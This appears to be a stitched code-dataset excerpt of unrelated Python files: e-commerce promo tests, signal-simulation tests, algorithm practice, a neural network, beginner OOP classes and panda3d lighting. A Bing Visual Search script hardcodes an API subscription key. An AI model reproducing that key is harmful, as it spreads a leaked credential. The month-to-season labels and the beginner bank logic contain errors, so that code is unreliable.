rgb=rgb)\n request += add_url\n response = self.report.request_json(request)\n\n if check_present:\n self.__check_present_promo_fragment(response, promo, msku, offer)\n else:\n self.__check_absent_promo_fragment(response, offer.waremd5)\n\n def test_spread_discount_count_active(self):\n \"\"\"\n Проверяем стандартный сценарий наличия прогрессирующей скидки от количества\n \"\"\"\n\n # Без флага и с флагом market_promo_blue_spread_discount_count=1 промо есть на выдаче\n self.check_promo(\n True, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n # C флагом market_promo_spread_discount_count=0 промо нет на выдаче\n self.check_promo(False, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[0])\n\n def test_spread_discount_count_whitelist(self):\n \"\"\"\n Проверяем, что без включения промо в белый список он не показывается на выдаче\n \"\"\"\n self.check_promo(\n True, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n 
)\n self.dynamic.loyalty -= [DynamicBlueGenericBundlesPromos(whitelist=[promo_sdc_single.key])]\n self.check_promo(\n False, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty += [DynamicBlueGenericBundlesPromos(whitelist=[promo_sdc_single.key])]\n\n def test_spread_discount_count_blacklist(self):\n \"\"\"\n Проверяем, что при включении промо в черный список он исчезает из выдачи\n \"\"\"\n self.check_promo(\n True, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty += [DynamicPromoKeysBlacklist(blacklist=[promo_sdc_single.key])]\n self.check_promo(\n False, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty += [DynamicPromoKeysBlacklist(blacklist=[])]\n\n def test_spread_discount_count_low_discount(self):\n \"\"\"\n Проверяем, что промо не попадает в выдачу при маленькой скидке\n \"\"\"\n\n self.check_promo(\n False,\n promo_sdc_too_low_discount,\n msku_for_too_low_discount.sku,\n blue_offer_for_too_low_discount,\n rearr_flags=[None, 0, 1],\n )\n\n def test_spread_discount_count_priority_lower(self):\n \"\"\"\n Проверяем, что если на синем оффере одновременно два промо SpreadDiscountCount и CheapestAsGift, то, согласно приоритетам\n на репорте, CheapestAsGift выигрывает.\n \"\"\"\n\n offer = blue_offer_loose_for_cg\n promo = promo_cg_win\n request = 'place=prime&rids=0®set=1&pp=18&offerid={}&rgb=blue'.format(offer.waremd5)\n request += '&rearr-factors=market_promo_spread_discount_count=1'\n\n response = self.report.request_json(request)\n\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': offer.waremd5,\n 'prices': {\n 'value': str(offer.price),\n 'currency': 'RUR',\n },\n 'promos': [\n {\n 'type': promo.type_name,\n 'key': promo.key,\n 'startDate': NotEmpty() if promo.start_date else Absent(),\n 'endDate': NotEmpty() if promo.end_date else Absent(),\n 'url': promo.url,\n 'itemsInfo': {\n 'count': promo.cheapest_as_gift.count,\n 'promo_url': promo.cheapest_as_gift.promo_url,\n 'link_text': promo.cheapest_as_gift.link_text,\n 'constraints': {\n 'allow_berubonus': promo.cheapest_as_gift.allow_berubonus,\n 'allow_promocode': promo.cheapest_as_gift.allow_promocode,\n },\n },\n }\n ],\n }\n ],\n allow_different_len=False,\n )\n self.dynamic.market_dynamic.disabled_promos = [DynamicPromo(promo_key=promo.key)]\n self.check_promo(\n True, promo_sdc_loose_for_cg, msku_loose_for_cg.sku, blue_offer_loose_for_cg, rearr_flags=[None, 1]\n )\n self.dynamic.market_dynamic.disabled_promos = []\n\n def test_spread_discount_count_and_direct_discount(self):\n \"\"\"\n Проверяем, что если на синем оффере одновременно два промо SpreadDiscountCount и DirectDiscount, то они оба возвращаются в выдаче.\n При этом promoPriceWithTotalDiscount в SpreadDiscountCount должен учитывать скидку DirectDiscount\n \"\"\"\n\n offer = blue_offer_for_two_promos\n msku = msku_for_two_promos.sku\n dd_item = promo_dd_two_promos.direct_discount.items[0]\n request = 'place=prime&rids=0®set=1&pp=18&market-sku={}&rgb=blue'.format(msku)\n request += '&rearr-factors=market_promo_spread_discount_count=1'\n\n discount_price = dd_item['discount_price']['value']\n offer_old_price = offer.price_old if offer.price_old else offer.price\n old_price = dd_item['old_price']['value'] if 'old_price' in dd_item else offer_old_price\n discount_percent = self.__calc_discount_percent(old_price, discount_price)\n\n response = 
self.report.request_json(request)\n\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': offer.waremd5,\n 'prices': {\n 'value': str(discount_price),\n 'currency': 'RUR',\n },\n 'promos': [\n {\n 'type': promo_dd_two_promos.type_name,\n 'key': promo_dd_two_promos.key,\n 'startDate': NotEmpty() if promo_dd_two_promos.start_date else Absent(),\n 'endDate': NotEmpty() if promo_dd_two_promos.end_date else Absent(),\n 'url': promo_dd_two_promos.url,\n 'itemsInfo': {\n 'price': {\n 'currency': 'RUR',\n 'value': str(discount_price),\n 'discount': {\n 'absolute': str(old_price - discount_price),\n 'oldMin': str(old_price),\n 'percent': discount_percent,\n },\n },\n 'constraints': {\n 'allow_berubonus': promo_dd_two_promos.direct_discount.allow_berubonus,\n 'allow_promocode': promo_dd_two_promos.direct_discount.allow_promocode,\n },\n },\n },\n promo_sdc_two_promos.spread_discount_count.promo_fragment(\n offer, msku, current_price=discount_price\n ),\n ],\n }\n ],\n allow_different_len=False,\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_blue_promo_spread_discount_count.py","file_name":"test_blue_promo_spread_discount_count.py","file_ext":"py","file_size_in_byte":17109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17794203961","text":"import unittest\n\nimport numpy as np\nfrom colorednoise import powerlaw_psd_gaussian\nfrom ..dummy_generator import (\n _make_time_index,\n dummy_physiological_noise,\n motion_noise,\n simulated_hemodynamics,\n)\nfrom mne.time_frequency import psd_array_multitaper\nfrom scipy.signal import savgol_filter\n\n\nclass DummyGeneratorTest(unittest.TestCase):\n def setUp(self):\n np.random.seed(42)\n\n def test_time_index(self):\n\n with self.assertRaises(RuntimeError):\n _make_time_index(0.001, 100)\n\n time_index = _make_time_index(1, 1000)\n\n self.assertTrue(np.allclose(time_index, np.arange(0, 1, 0.001)))\n\n time_index = _make_time_index(5, 50)\n self.assertEqual(time_index.shape[0], 50 * 5)\n\n def test_consistent_behavior(self):\n # duration and sample_rate should work the same way in all the generators\n\n sample_rate = 50\n duration = 1\n n_samples = duration * sample_rate\n sim_Hb = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate, duration=duration\n )\n\n physio_noise = dummy_physiological_noise(\n amplitude=4e-7,\n sample_rate=sample_rate,\n interest_freq=1,\n phase=np.pi / 4,\n duration=duration,\n )\n\n measurement_noise = powerlaw_psd_gaussian(exponent=1.0, size=n_samples)\n\n self.assertEqual(sim_Hb.shape, physio_noise.shape)\n self.assertEqual(sim_Hb.shape, measurement_noise.shape)\n\n def test_sim_hemodynamics(self):\n duration = 30\n sample_rate = 50\n\n # Create simulated hemodynamics\n\n sim_Hb1 = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate, duration=duration\n )\n\n sim_Hb2 = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate * 2, duration=duration\n )\n\n # check that peak is basically 5s\n ts1 = _make_time_index(duration, sample_rate)\n ts2 = _make_time_index(duration, sample_rate * 2)\n self.assertAlmostEqual(np.abs(ts1[np.argmax(sim_Hb1)] - 5.0), 0)\n self.assertAlmostEqual(np.abs(ts2[np.argmax(sim_Hb2)] - 5.0), 0)\n\n def test_physiological_noise(self):\n duration = 1\n sample_rate = 1000\n interest_freq = 1\n\n sim_Hb = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate, duration=duration\n )\n # Simulated cardiac 
noise\n cardiac_wave = dummy_physiological_noise(\n amplitude=4e-7,\n sample_rate=sample_rate,\n interest_freq=interest_freq,\n phase=np.pi / 4,\n duration=duration,\n )\n # Check dimensions\n self.assertEqual(sim_Hb.shape, cardiac_wave.shape)\n\n # Calculate the PSD and make sure the peak is in 1 Hz\n # calculate multitaper PSD\n psds, freqs = psd_array_multitaper(cardiac_wave, sample_rate, n_jobs=12)\n power_log10 = np.log10(psds)\n ind_of_peak = np.unravel_index(\n np.argmax(power_log10, axis=None), power_log10.shape\n )[0]\n self.assertAlmostEqual(freqs[ind_of_peak], interest_freq)\n\n cardiac_wave_double_freq = dummy_physiological_noise(\n amplitude=4e-7,\n sample_rate=sample_rate * 2,\n interest_freq=interest_freq,\n phase=np.pi / 4,\n duration=duration,\n )\n\n self.assertTrue(np.allclose(cardiac_wave, cardiac_wave_double_freq[::2]))\n\n def test_pink_noise(self):\n beta = 1\n sample_rate = 500\n duration = 2\n n_samples = duration * sample_rate\n y = powerlaw_psd_gaussian(exponent=beta, size=n_samples)\n # calculate the PSD\n psds, freqs = psd_array_multitaper(y, sample_rate, n_jobs=12)\n\n # after enough smoothing on PSD,\n # pink noise should follow smooth 1/f curve\n # thus low freq power > high freq power\n psds_smooth = savgol_filter(psds, 101, 3)\n low_freq_power = np.median(psds_smooth[:10])\n med_freq_power = np.median(psds_smooth[80:110])\n high_freq_power = np.median(psds_smooth[400:])\n self.assertGreaterEqual(low_freq_power, med_freq_power)\n self.assertGreaterEqual(med_freq_power, high_freq_power)\n\n # make sure behavior is same if we change sampling frequency\n # TODO: make this a slightly more robust test\n y_double_freq = powerlaw_psd_gaussian(exponent=beta, size=2 * n_samples)\n psds, freqs = psd_array_multitaper(y_double_freq, sample_rate, n_jobs=12)\n\n psds_smooth = savgol_filter(psds, 101, 3)\n low_freq_power = np.median(psds_smooth[:10])\n med_freq_power = np.median(psds_smooth[80:110])\n high_freq_power = np.median(psds_smooth[400:])\n self.assertGreaterEqual(low_freq_power, med_freq_power)\n self.assertGreaterEqual(med_freq_power, high_freq_power)\n\n def test_motion_noise(self):\n duration = 20\n sample_rate = 5000\n\n # this conveniently checks that we don't throw if duration\n # exceeds window ize\n noise = motion_noise(\n motion_amplitude=3,\n motion_duration_mean=0.5,\n sample_rate=sample_rate,\n sample_duration=duration,\n )\n\n # the nonzero (noise) part should have slope \\approx motion_amplitude\n # but this is not a tight test since we get a random chunk\n nonzero = noise[noise > 0]\n slope = (nonzero[-1] - nonzero[0]) / len(nonzero) * sample_rate\n self.assertAlmostEqual(slope, 3.0, places=2)\n\n sample_rate = 150\n noise = motion_noise(\n motion_amplitude=1.75,\n motion_duration_mean=0.5,\n sample_rate=sample_rate,\n sample_duration=duration,\n )\n\n nonzero = noise[noise > 0]\n slope = (nonzero[-1] - nonzero[0]) / len(nonzero) * sample_rate\n self.assertAlmostEqual(slope, 1.75, places=2)\n","repo_name":"facebookresearch/labgraph","sub_path":"signal_processing/synthetic_data/tests/test_dummy_generator.py","file_name":"test_dummy_generator.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"72"} +{"seq_id":"72620352233","text":"# morse_dict = {'.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E', '..-.': 'F', '--.': 'G',\r\n# '....': 'H', '..': 'I', '.---': 'J', '-.-': 'K', '.-..': 'L', '--': 'M', '-.': 'N',\r\n# '---': 'O', '.--.': 'P', '--.-': 'Q', 
'.-.': 'R', '...': 'S', '-': 'T', '..-': 'U',\r\n# '...-': 'V', '.--': 'W', '-..-': 'X', '-.--': 'Y', '--..': 'Z'}\r\n\r\n# strokes_dict = {'A': 3, 'B': 2, 'C': 1, 'D': 2, 'E': 3, 'F': 3, 'G': 2, 'H': 3, 'I': 3, 'J': 1,\r\n# 'K': 2, 'L': 1, 'M': 2, 'N': 2, 'O': 1, 'P': 2, 'Q': 2, 'R': 2, 'S': 1, 'T': 2,\r\n# 'U': 1, 'V': 1, 'W': 1, 'X': 2, 'Y': 2, 'Z': 1}\r\n\r\n# f = [0] + [float('inf')] * len('--..--.')\r\n# for i in range(1, len('--..--.')+1):\r\n# for j in range(i):\r\n\r\n# if '--..--.'[j:i] in morse_dict:\r\n# f[i] = min(f[i], f[j] + strokes_dict[morse_dict['--..--.'[j:i]]])\r\n# print(morse_dict['--..--.'[j:i]], strokes_dict[morse_dict['--..--.'[j:i]]])\r\n# print(f[len('--..--.')])\r\n\r\nfrom collections import deque\r\n\r\n\r\ndef longestSubarray(nums, limit = 1) :\r\n # Example: [10,1,2,4,7,4,3,1], limit = 5\r\n dqMax, dqMin = deque(), deque()\r\n ans = 0\r\n l = 0\r\n n = len(nums)\r\n for r in range(n):\r\n while dqMax and nums[dqMax[-1]] <= nums[r]: # If we found a larger element then no need to keep smaller elements\r\n dqMax.pop()\r\n while dqMin and nums[dqMin[-1]] >= nums[r]: # If we found a smaller element then no need to keep larger elements\r\n dqMin.pop()\r\n dqMax.append(r)\r\n dqMin.append(r)\r\n \r\n while nums[dqMax[0]] - nums[dqMin[0]] > limit:\r\n l += 1 # Shrink size by moving the left pointer\r\n if dqMax[0] < l: dqMax.popleft()\r\n if dqMin[0] < l: dqMin.popleft()\r\n \r\n ans = max(ans, r - l + 1)\r\n \r\n return ans\r\n\r\nh = [1,3,3,3,4,4,7,8,7,8,7,4,8,7]\r\nprint(longestSubarray(h))\r\nn = len(h)\r\nleft = 0\r\nright = 0\r\n# max_height = h[0]\r\n# min_height = h[0]\r\n# max_length = 0\r\n\r\n# n = len(h)\r\n# left = 0\r\n# max_length = 0\r\n# max_height = h[0]\r\n# min_height = h[0]\r\n\r\n# # for right in range(n):\r\n# # max_height = max(max_height, h[right])\r\n# # min_height = min(min_height, h[right])\r\n# # if max_height - min_height > 1:\r\n# # left += 1\r\n# # # adjust max_height and min_height using two pointers\r\n# # if h[left-1] == max_height:\r\n# # max_height = max(h[left:right+1])\r\n# # if h[left-1] == min_height:\r\n# # min_height = min(h[left:right+1])\r\n# # max_length = max(max_length, right - left + 1)\r\n\r\n# # print(max_length)\r\n\r\n\r\ntemp = 1\r\nmax_length = 0\r\nprev = False\r\nmin_height = h[0]\r\nmax_height = h[0]\r\nfor i in range(1,len(h)):\r\n min_height = min(min_height,h[i], h[i-1])\r\n max_height = max(max_height,h[i], h[i-1])\r\n if max_height - min_height > 1:\r\n temp = 1\r\n min_height = h[i]\r\n max_height = h[i]\r\n else:\r\n temp += 1\r\n max_length = max(max_length, temp)\r\n\r\nprint(max_length)\r\n\r\n# for i in range(1,len(h)):\r\n# if abs(h[i] - h[i-1]) < 1:\r\n# temp += 1\r\n# prev = False\r\n# print(temp,\"here\")\r\n# elif abs(h[i] - h[i-1]) == 1 and prev == True:\r\n# temp += 1\r\n# print(temp)\r\n# max_length = max(max_length, temp)\r\n# prev = False\r\n# temp = 1\r\n# elif abs(h[i] - h[i-1]) >= 1 and prev == True:\r\n# temp = 1\r\n# prev=False\r\n# # elif abs(h[i] - h[i-1]) <= 1 and prev:\r\n# # temp += 1\r\n# max_length = max(max_length, temp)\r\n\r\n# print(max_length)\r\n\r\n\r\n # temp = 0\r\n # min_height = min(min_height,h[i])\r\n # max_height = max(max_height,h[i])\r\n # if max_height - min_height > 1:\r\n\r\n\r\n\r\n# max_length = 0\r\n# max_height = h[0]\r\n# min_height = h[0]\r\n# while right < n-1:\r\n# right += 1\r\n# max_height = max(max_height, h[right])\r\n# min_height = min(min_height, h[right])\r\n# while max_height - min_height > 1:\r\n# left += 1\r\n# max_height = 
max(h[left:right+1])\r\n#         min_height = min(h[left:right+1])\r\n#     max_length = max(max_length, right - left + 1)\r\n\r\n# print( max_length)\r\n\r\n\r\n# print(longestSubarray([1,3,4,4,7,7,7,8]))","repo_name":"ashwinnellimuttath/Algorithms-Coursework-UCR","sub_path":"3assignment/challenge/stroke.py","file_name":"stroke.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"29001567187","text":"mes=int(input(\"digite el numero segun corresponda al mes \\n \"\r\n              \"1 ->enero \\n\"\r\n              \"2 ->febrero \\n\"\r\n              \"3 ->marzo \\n\"\r\n              \"4 ->abril \\n\"\r\n              \"5 ->mayo \\n\"\r\n              \"6 ->junio \\n\"\r\n              \"7 ->julio \\n\"\r\n              \"8 ->agosto\\n\"\r\n              \"9 ->septiembre \\n\"\r\n              \"10 ->octubre \\n\"\r\n              \"11 ->noviembre \\n\"\r\n              \"12 ->diciembre \\n\"\r\n))\r\n\r\nif mes>0 and mes<=3:\r\n    print(\"invierno\")\r\nelif mes>=4 and mes<=6:\r\n    print (\"Equinoccio de primavera que inicia en 20 de marzo 21 de junio\")\r\nelif mes>=7 and mes<=9:\r\n    print (\"Solsticio de verano (21 de junio) - Equinoccio de otoño (23 de septiembre)\")\r\nelif mes>=10 and mes<=12:\r\n    print(\"Equinoccio de otoño (23 de septiembre) - Solsticio de invierno (22 de diciembre)\")\r\nelse:\r\n    print(\"dato erroneo\")","repo_name":"luisfe23os/condiciones1","sub_path":"clima.py","file_name":"clima.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18118943450","text":"import requests, json\n\nBASE_URI = 'https://api.bing.microsoft.com/v7.0/images/visualsearch'\nSUBSCRIPTION_KEY = '438b8e05404840cd9726c5d9802f9f16'\nfilePath = 'test_image.jpg'\n\n#formData = '{\"knowledgeRequest\":{\"invokedSkills\": [\"SimilarImages\"]}}'\n\n#file = {'knowledgeRequest': (None, formData)}\n\nfile = {'image' : ('myfile', open(filePath, 'rb'))}\n\n\nHEADERS = {'Ocp-Apim-Subscription-Key': SUBSCRIPTION_KEY}\n\ndef print_json(obj):\n    \"\"\"Print the object as json\"\"\"\n    print(json.dumps(obj, sort_keys=True, indent=2, separators=(',', ': ')))\n\ndef save_json(obj, file_path):\n    with open(file_path, \"w\") as json_file:\n        json.dump(obj, json_file)\n\ntry:\n    response = requests.post(BASE_URI, headers=HEADERS, files=file)\n    response.raise_for_status()\n    #tags = response.json().tags\n    #print(len(tags))\n    #print_json(response.json())\n    #print(response.json()[\"tags\"])\n    save_json(response.json(), \"response.json\")\n    \nexcept Exception as ex:\n    raise ex\n","repo_name":"1viorel/hacktm2023_4c4w","sub_path":"python_backend/test_bing_visual.py","file_name":"test_bing_visual.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"21550869562","text":"\"\"\"\ntelemetry_logger.py\n\nWrites telemetry data to CSV file\n\"\"\"\n\nimport time\n\nclass TelemetryLogger(object):\n    def __init__(self, is_enabled): \n        self.is_enabled = is_enabled\n\n    def start(self):\n        if self.is_enabled:\n            timestr = time.strftime(\"%m%d-%H%M\")\n            fname = \"telemetry-\" + timestr + \".csv\"\n            print(\"Opening telemetry log file:\", fname)\n            self.outfile = open(fname,\"w\")\n            self.outfile.write(\"time,surge,sway,heave,roll,pitch,yaw\\n\")\n    \n    def stop(self):\n        if self.is_enabled:\n            self.outfile.close()\n            print(\"Closing log file\")\n\n    def write(self, data):\n        if self.is_enabled:\n            self.outfile.write(data)\n\nif __name__ == \"__main__\":\n\n    t = TelemetryLogger(True)\n    t.start()\n    
t.write(\"0,1,2,3,4,5,6\\n\")\n t.write(\"1,2,3,4,5,6,7\\n\")\n t.stop()\n","repo_name":"michaelmargolis/MdxMotionPlatformV3","sub_path":"runtime/agents/nolimits_coaster/telemetry_logger.py","file_name":"telemetry_logger.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33111712156","text":"#!/usr/bin/env python\n#\n# This code is heavily based on code used during video lectures from\n# Mathematical Monk's videos about Gaussian Processes on youtube\n#\n# https://www.youtube.com/user/mathematicalmonk\n#\n# I am just reimplementing it in an attempt to understand it better\n\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport argparse\n\n\ndef cov_function(c):\n \"\"\" Returns a covariance function given an int input\"\"\"\n return {\n '1': lambda x, y : 1 * (x.T * y),\n '2': lambda x, y : 1 * min(x, y),\n '3': lambda x, y : np.exp(-100 * ((x - y).T * (x - y)))\n }[str(c)]\n\ndef main():\n parser = argparse.ArgumentParser(description='Script to draw functions from '\\\n 'a Gaussian Process')\n parser.add_argument('-x', type=int, nargs=2, default=(0,5))\n parser.add_argument('-s', type=int, default=100)\n parser.add_argument('-c', type=int, default=1)\n args = parser.parse_args()\n\n # Sample values\n x = np.linspace(args.x[0], args.x[1], num=args.s)\n n = len(x)\n # Covariance matrix\n c = np.zeros((n, n))\n # Select covariance function\n k = cov_function(args.c)\n\n # Build a covariance matrix using x values and the covariance function\n for i in range(n):\n for j in range(n):\n c[i, j] = k(x[i], x[j])\n\n # Now we randomly sample from the distribution made by the covariance matrix\n u = np.random.randn(n, 1)\n A, s, B = np.linalg.svd(c)\n S = np.diag(s)\n z = A.dot(np.sqrt(S).dot(u))\n\n plot.plot(x, z)\n plot.show()\n\nif __name__=='__main__':\n main()\n","repo_name":"andrewrch/gp_visualise_1d","sub_path":"gp_visualise_1d.py","file_name":"gp_visualise_1d.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21933497952","text":"import numpy as np\nimport random\n\nclass Network(object):\n\n def __init__(self,sizes):\n # sizes: array, numbers of neurons at each layer\n self.NumOfLayers = len(sizes)\n self.sizes = sizes\n # weights: between two neighbour layers there is a weight matrixe with size (n+1 th layer\n # size, n th layer size)\n self.weights = [np.random.randn(y,x) for x,y in zip(sizes[:-1],sizes[1:])]\n # input layer (0th) has no bias\n self.biases = [np.random.randn(x,1) for x in sizes[1:]]\n\n def FeedForward(self,a):\n # iteratively calculate output of a neural network\n # no need to save intermedia values, because this function is only used for evaluation\n for w,b in zip(self.weights,self.biases):\n a = sigmoid(np.dot(w,a)+b) # matrix multiply\n return a\n\n def BPCore(self, Input, RefResult):\n # calculate \\nabla{b} and \\nabla{w} using backward propagation\n # allocate memory for nabla results\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n # --------- feed forward ----------\n # first activation array is input\n actv = Input\n # save every intermedia activation arrar\n actvs = [actv]\n # save every intermedia z (start from layer 2)\n zs = []\n # do feed forward\n for b,w in zip(self.biases,self.weights):\n z = np.dot(w,actv) + b\n zs.append(z)\n actv = sigmoid(z)\n actvs.append(actv)\n # --------- 
backward propagate ---------\n # for the last layer\n delta = cross_entropy_cost_derivate(actvs[-1], RefResult)\n # foundation equation 3\n nabla_b[-1] = delta\n # foundation equation 4\n nabla_w[-1] = np.dot(delta, actvs[-2].transpose())\n # for -2 ~ 1 layers\n for l in xrange(2,self.NumOfLayers):\n z = zs[-l]\n zp = sigmoid_d(z)\n # update delta\n delta = np.dot(self.weights[-l + 1].transpose(),delta) * zp\n nabla_b[-l] = delta\n nabla_w[-l] = np.dot(delta,actvs[-l-1].transpose())\n return (nabla_b,nabla_w)\n\n def update_network(self, TrainData, eta):\n # update weights and biases of network according a batch of examples in TrainData\n # calculate \\nabla{b} and \\nabla{w} according to each example\n # then use mean value from all examples in gradient descent\n # eta is the learning rate\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n # for each example\n for Input,RefResult in TrainData:\n nabla_b_i,nabla_w_i = self.BPCore(Input,RefResult)\n nabla_b = [nb + nbi for nb,nbi in zip(nabla_b,nabla_b_i)]\n nabla_w = [nw + nwi for nw,nwi in zip(nabla_w,nabla_w_i)]\n # do update\n self.weights = [ow - eta * (nw / len(TrainData)) for ow,nw in zip(self.weights,nabla_w)]\n self.biases = [ob - eta * (nb / len(TrainData)) for ob,nb in zip(self.biases,nabla_b)]\n\n def evaluate(self,TestData):\n # use FeedForward on each test sample\n r = [(np.argmax(self.FeedForward(T)),y) for (T,y) in TestData]\n # how many of them is right?\n return sum([int(x==y) for (x,y) in r])\n\n def StochasticGradientDesent(self, TrainData, TrainRound, BatchSize, eta, TestData = None):\n # wrapper function to organise all above functions\n # split TrainData into batches, feed them to update_network in batch-by-batch manner\n # repeat the procedure for TrainRound times\n # after each train round, apply TestData to evaluate the network, and output result\n NumOfTrainData = len(TrainData)\n for i in xrange(TrainRound):\n # rearrange train data randomly\n random.shuffle(TrainData)\n # in python expression array[a:b], b can be larger than len(array)\n # when b > len(array), array[a:b] = array[a:]\n TrainDataBatches = [TrainData[k:k+BatchSize] for k in xrange(0,NumOfTrainData,BatchSize)]\n # update network\n for batch in TrainDataBatches:\n self.update_network(batch,eta)\n # test and output if required\n if TestData:\n print(\"Round {0}: {1} / {2} correct\"\n \"...\".format(i+1,self.evaluate(TestData),len(TestData)))\n else:\n print(\"Round {0} train finished ...\".format(i))\n\n# calculate derivate of square cost function\ndef cross_entropy_cost_derivate(OutputActivation, ReferenceResult):\n return OutputActivation - ReferenceResult\n\n# sigmoid functions\n# sigmoid\ndef sigmoid(z):\n # input can be signle number or array\n return 1.0/(1.0+np.exp(-z))\n# devivate of sigmoid\ndef sigmoid_d(z):\n r = sigmoid(z)\n return r*(1-r)\n","repo_name":"metorm/DeepLearningTutorial","sub_path":"Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17021461200","text":"# OOPS\n# Syntax\n# class Classname:\n#\n# class Person:\n#\n#\n# def speak(self):\n# print('welcome')\n#\n#\n# obj1=Person()\n\n\nclass Student:\n def marks(self):\n a = 10\n b = 20\n print(a + b)\n\n\nobj2 = Student()\nobj3 = Student()\n\n\n# can create mulitple objects for a class\n# here marks is the behaviour or functionality of the objects\n\n# self is used to point to the 
instance variable\n#\n# class Employee:\n#     def details(self, salary, age):\n#         self.salary = salary\n#         self.age = age\n\n\n# Bank Class\n\nclass Bank:\n    def details(self, bank, minibalance):\n        self.bank = bank\n        self.minibalance = minibalance\n\n    def deposit(self, account):\n        amount = int(input('Enter amount: '))\n        self.minibalance += amount\n\n    def withdrawal(self, balance):\n        self.minibalance = balance\n        withdraw_amt = int(input('Enter amount to withdraw: '))\n        self.minibalance -= withdraw_amt\n\n    def bal_enquiry(self, balance):\n        self.minibalance = balance\n\n    # def withdrawal(self,minibalance):\n\n\nclass Student:\n    def details(self, name, id, college):\n        self.stud_name = name\n        self.stud_id = id\n        self.college = college\n\n    def display(self):\n        print('Student Name: ', self.stud_name)\n        print('ID: ', self.stud_id)\n        print('college: ', self.college)\n\n\nclass Bank:\n    def account_details(self, holder_name, account_type, balance, max_amount, min_amount):\n        self.name = holder_name\n        self.type = account_type\n        self.balance = balance\n        self.max_amt = max_amount\n        self.min_amt = min_amount\n\n    def deposit(self):\n        amount = int(input('Amount: '))\n        if amount < self.max_amt:\n            self.balance += amount\n            print(self.balance)\n        else:\n            print('Amount Exceeded')\n\n    def withdrawal(self, min_amount):\n        print('Current Balance:', self.balance)\n        amount = int(input('Amount: '))\n\n        if amount < self.min_amt:\n            self.balance -= amount\n            print(self.balance)\n        else:\n            print('min_amount exceeded')\n","repo_name":"jisshub/python-django-training","sub_path":"oops-python/oop-basics.py","file_name":"oop-basics.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4318196948","text":"# panda3d imports\nfrom panda3d.core import (AmbientLight, Spotlight, PointLight, Vec3)\n\n__author__ = \"Jonty Doyle\"\n__email__ = \"dyljon001@myuct.ac.za\"\n__date__ = \"21 September 2022\"\n\nLIGHT_HEIGHT = 100\n\n\nclass Lights:\n    \"\"\"Defines lighting for rendered model\"\"\"\n\n    def __init__(self, base):\n        self.base = base\n        self.__set_lights()\n\n    def __set_lights(self):\n        \"\"\"Sets default lighting\"\"\"\n        self.__set_ambient_light()\n        self.__set_down_light(0.8, LIGHT_HEIGHT)\n        self.__set_point_light(0.6)\n\n    def __set_ambient_light(self):\n        \"\"\"Sets light as ambient as defined in panda3d\"\"\"\n        a = AmbientLight('ambient-light')\n        a.setColor((0.2, 0.2, 0.2, 1))\n        node = self.base.render.attachNewNode(a)\n        node.setZ(LIGHT_HEIGHT)\n        self.base.render.setLight(node)\n\n    def __set_down_light(self, strength, height):\n        \"\"\"Sets direction of down light as defined by panda3d\"\"\"\n        p = PointLight('down-light')\n\n        p.setShadowCaster(True, 512, 512)\n        p.setColor((strength, strength, strength, 1))\n\n        node = self.base.render.attachNewNode(p)\n        node.setZ(height)\n        node.lookAt(0, 0, 0)\n        self.base.render.setLight(node)\n\n    def __set_point_light(self, strength):\n        \"\"\"Sets direction of point light light as defined by panda3d\"\"\"\n        p = PointLight('point-light')\n        p.setColor((strength, strength, strength, 1))\n\n        self.light_node = self.base.render.attachNewNode(p)\n        self.base.render.setLight(self.light_node)\n\n    def update(self, config):\n        \"\"\"Updates model lighting.\n        Typically used when model is created or cleared.\"\"\"\n        self.light_node.setPos(-config.x, -config.y, LIGHT_HEIGHT)\n        self.light_node.lookAt(0, 0, 
